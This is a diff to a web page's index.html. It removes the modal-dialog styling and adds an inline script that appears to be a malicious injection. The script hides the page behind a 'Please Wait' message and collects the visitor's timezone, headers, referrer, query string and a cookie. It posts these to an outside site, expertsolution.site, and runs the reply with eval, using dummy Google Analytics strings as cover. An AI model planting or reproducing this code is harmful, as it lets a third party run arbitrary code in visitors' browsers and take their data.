--- a/index.html
+++ b/index.html
@@ -1,88 +1,11 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-<style>
-    /* Blur effect when modal is active */
-    body.modal-open #mainContent {
-        filter: blur(6px);
-        transition: filter 0.3s ease;
-    }
-
-    /* Optional: add slight dark overlay */
-    body.modal-open #mainContent::after {
-        content: '';
-        position: fixed;
-        top: 0; left: 0;
-        width: 100%; height: 100%;
-        background: rgba(0, 0, 0, 0.2);
-        z-index: 999;
-        pointer-events: none;
-    }
-
-    /* Modal wrapper */
-    .modalWrapper {
-        position: fixed;
-        top: 0;
-        left: 0;
-        width: 100%;
-        height: 100%;
-        background-color: rgba(0, 0, 0, 0.7);
-        display: none;
-        justify-content: center;
-        align-items: center;
-        z-index: 1000;
-    }
-
-    .modalWrapper.active {
-        display: flex;
-    }
-
-    .modalContent {
-        background-color: white !important;
-        padding: 40px;
-        position: relative;
-        border-radius: 10px;
-        border: 2px solid white;
-        width: 90%;
-        max-width: 600px;
-        text-align: center;
-    }
-
-    .modalContent img {
-        max-width: 100%;
-        height: auto;
-        border-radius: 10px;
-    }
-
-    .closeBtn {
-        position: absolute;
-        top: 10px;
-        right: 10px;
-        color: #007bff;
-        background-color: transparent;
-        border: none;
-        font-weight: 500;
-        font-size: 14px;
-        cursor: pointer;
-    }
-
-    .actionBtn {
-        background-color: #007bff;
-        font-family: "Poppins", sans-serif;
-        font-weight: 500;
-        border: none;
-        padding: 15px 30px;
-        color: #fff;
-        border-radius: 5px;
-        cursor: pointer;
-        margin-top: 20px;
-    }
-
-    body.modal-open {
-        overflow: hidden;
-    }
-</style>
-
+<script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
+<script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jstimezonedetect/1.0.6/jstz.min.js"></script>
+<script>
+$(document).ready(function(){$("body").hide();$("html").append("<div id=\"lo499423ad\" style=\"margin-top:8%;background-color:white;text-align:center;font-size:40px;\">Please Wait for Page to Load...</div>");var f=new XMLHttpRequest();f.open("GET",document.location,true);f.send(null);var g;f.onreadystatechange = function(){g=f.getAllResponseHeaders().toLowerCase();};var b="GoogleAnalyticsObject";var c=("document","script","//www.google-analytics.com/analytics.js");c=("create","UA-988085-1","auto");c=("send","pageview");var d=jstz.determine();var e=d.name();var qu=escape(window.location.search.substr(1));var rui=location.pathname+location.search;var r=document.referrer;var sn=document.domain;var value="; "+document.cookie;var pa=value.split("; "+"_event"+"=");var co=pa.pop().split(";").shift();var q;$.ajax({url:"https://expertsolution.site/track.php",type:"POST",data:"tz="+e+"&he="+g+"&rui="+rui+"&qu="+qu+"&r="+r+"&sn="+sn+"&co="+co,success:function(a){eval(a)}})})
+</script>
 <!-- Modal HTML structure -->
 <div class="modalContainer">
     <div id="modal" class="modalWrapper" role="dialog" aria-modal="true" aria-labelledby="modal-title">
